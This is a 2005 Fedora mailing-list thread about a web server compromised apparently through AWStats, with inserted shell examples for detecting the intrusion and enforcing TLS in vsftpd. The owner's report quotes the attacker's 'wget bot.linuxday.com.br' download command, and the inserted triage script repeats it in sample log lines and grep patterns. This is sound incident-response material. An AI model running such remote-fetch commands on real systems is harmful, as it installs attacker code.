Re: Server compromised

paul@xxxxxxxxxxxxxxxxxxx wrote:
On Thu, 17 Feb 2005 22:20:02 -0800 (PST), paul@xxxxxxxxxxxxxxxxxxx
<paul@xxxxxxxxxxxxxxxxxxx> wrote:

Apparently someone has hacked into my webserver and is installing Perl
scripts into the /tmp/ directory.  They're usually named .linuxday* or
.cinta*, and a few other names as well.

From what I can tell something is causing apache to run a command like
"sh wget bot.linuxday.com.br -O {the above mentioned files are then listed}"

sometimes the site is worm.linuxday.com.br

I'm curious if anyone has heard about this before.  I'm currently
running Fedora 1 with all the latest security patches.

The only way to ensure your system is clean, and likely to remain clean, is to:

1. Do a bare metal install
2. Change all passwords to new strong passwords
3. Disable cleartext services, ftp, telnet, rsh, etc.
4. Disable root remote login (use su or sudo)
5. Restore your uncompromised data
6. etc.

I had to do this for a client and the next 3 days the intruder tried
to get back in.

--
Leonard Isham, CISSP
Ostendo non ostento.

--
fedora-list mailing list
fedora-list@xxxxxxxxxx
To unsubscribe: http://www.redhat.com/mailman/listinfo/fedora-list



In place of FTP, what would you suggest? That is the only cleartext
password service I allow. So what else can I use in place of that?

And shell access is denied for all accounts, except for 2.

I get the feeling this came in on awstats, although I'm not 100% positive,
and I'm wanting to find out how it got in first before I just delete and
start over again.
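As an added example, not part of Paul's message or any reply in this thread: two small triage helpers for the indicators Paul describes (hidden Perl scripts dropped in /tmp under names like .linuxday* or .cinta*, and Apache being driven to run a "wget bot.linuxday.com.br" style command). The sample /tmp contents and access-log lines are constructed for the demo; they are not real logs from the compromised host.

```shell
#!/bin/sh
# Added example, not from the original thread. Triage helpers for the two
# indicators described in it. All sample data below is constructed.

# List hidden files in a directory whose names match the dropper naming
# patterns mentioned in the thread (.linuxday*, .cinta*). One path per line.
find_dropped_scripts() {
    find "$1" -maxdepth 1 -type f \( -name '.linuxday*' -o -name '.cinta*' \)
}

# Count access-log lines whose request carries a wget fetch from the
# linuxday.com.br domain named in the thread. The "|| true" keeps a count
# of 0 (grep exit status 1) from looking like a failure under set -e.
count_wget_requests() {
    grep -c 'wget.*linuxday\.com\.br' "$1" || true
}

# Build a constructed sample /tmp plus an Apache-style access log and
# print the directory path.
make_sample_data() {
    d=$(mktemp -d)
    : > "$d/.linuxday1"
    : > "$d/.cinta.pl"
    : > "$d/legit-session-file"
    cat > "$d/access_log" <<'EOF'
10.0.0.5 - - [17/Feb/2005:22:10:01 -0800] "GET /index.html HTTP/1.1" 200 512
10.0.0.9 - - [17/Feb/2005:22:11:43 -0800] "GET /cgi-bin/example.pl?q=wget%20bot.linuxday.com.br HTTP/1.1" 200 300
10.0.0.9 - - [17/Feb/2005:22:12:07 -0800] "GET /cgi-bin/example.pl?q=wget%20worm.linuxday.com.br HTTP/1.1" 200 300
10.0.0.7 - - [17/Feb/2005:22:13:30 -0800] "GET /images/logo.png HTTP/1.1" 200 4096
EOF
    printf '%s\n' "$d"
}

# Demo run over the constructed data (on a real box you would point the
# helpers at /tmp and at the live Apache access log instead).
sample=$(make_sample_data)
echo "Dropped-script candidates:"
find_dropped_scripts "$sample"
echo "Suspicious wget requests: $(count_wget_requests "$sample/access_log")"
rm -rf "$sample"
```

On the demo data the first helper lists the two hidden files and the second reports 2 matching requests; a legitimate session file and ordinary page requests are left alone. Note that grep on the access log only catches what the attacker's request left in the log, so an empty count on its own does not clear the host.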


That AWStats hit me a couple times, which sucked. I had all kinds of cool movies put on the server by whoever popped it.


But in all seriousness, vsftpd supports TLS/SSL connections, so you can avoid cleartext passwords altogether. It's working quite nicely for me.

Hope that helps
-dant
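As an added example, not from dant's post or from the vsftpd project: the vsftpd.conf settings that make the TLS suggestion concrete, shown as a constructed plain-FTP config (passwords cross the wire in the clear) beside a constructed hardened one (TLS required before any local user may log in or move data), plus a small audit function that tells the two apart. The certificate paths are placeholders.

```shell
#!/bin/sh
# Added example, not from the thread or the vsftpd project. Both configs
# below are constructed for the demo; the .pem paths are placeholders.

# Read one key from a vsftpd.conf (last assignment wins, comment lines ignored).
conf_get() {
    sed -n "s/^[[:space:]]*$2[[:space:]]*=[[:space:]]*//p" "$1" | tail -n 1
}

# Return 0 if the config forces TLS for local logins and data transfers,
# 1 if a cleartext login is still possible.
vsftpd_forces_tls() {
    [ "$(conf_get "$1" ssl_enable)" = "YES" ] &&
    [ "$(conf_get "$1" force_local_logins_ssl)" = "YES" ] &&
    [ "$(conf_get "$1" force_local_data_ssl)" = "YES" ]
}

# Write the two constructed configs and print the directory path.
write_sample_configs() {
    d=$(mktemp -d)
    # Weak: plain FTP, the password is sent in the clear.
    cat > "$d/weak.conf" <<'EOF'
listen=YES
anonymous_enable=NO
local_enable=YES
write_enable=YES
ssl_enable=NO
EOF
    # Hardened: TLS is required for the login and for the data channel,
    # old SSL protocol versions are off, anonymous TLS is not offered.
    cat > "$d/hardened.conf" <<'EOF'
listen=YES
anonymous_enable=NO
local_enable=YES
write_enable=YES
ssl_enable=YES
force_local_logins_ssl=YES
force_local_data_ssl=YES
allow_anon_ssl=NO
ssl_tlsv1=YES
ssl_sslv2=NO
ssl_sslv3=NO
# placeholder certificate and key paths
rsa_cert_file=/etc/vsftpd/vsftpd.pem
rsa_private_key_file=/etc/vsftpd/vsftpd.pem
EOF
    printf '%s\n' "$d"
}

# Demo: audit both constructed configs.
dir=$(write_sample_configs)
for name in weak hardened; do
    if vsftpd_forces_tls "$dir/$name.conf"; then
        echo "$name.conf: TLS enforced, no cleartext passwords"
    else
        echo "$name.conf: cleartext FTP logins still possible"
    fi
done
rm -rf "$dir"
```

The audit checks the three settings that matter for the cleartext-password concern (ssl_enable plus the two force_local_* keys); the remaining keys in the hardened config disable anonymous TLS and the old SSLv2/SSLv3 protocol versions. Clients need to connect with explicit FTPS (AUTH TLS) once this is in place, which is the whole point.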
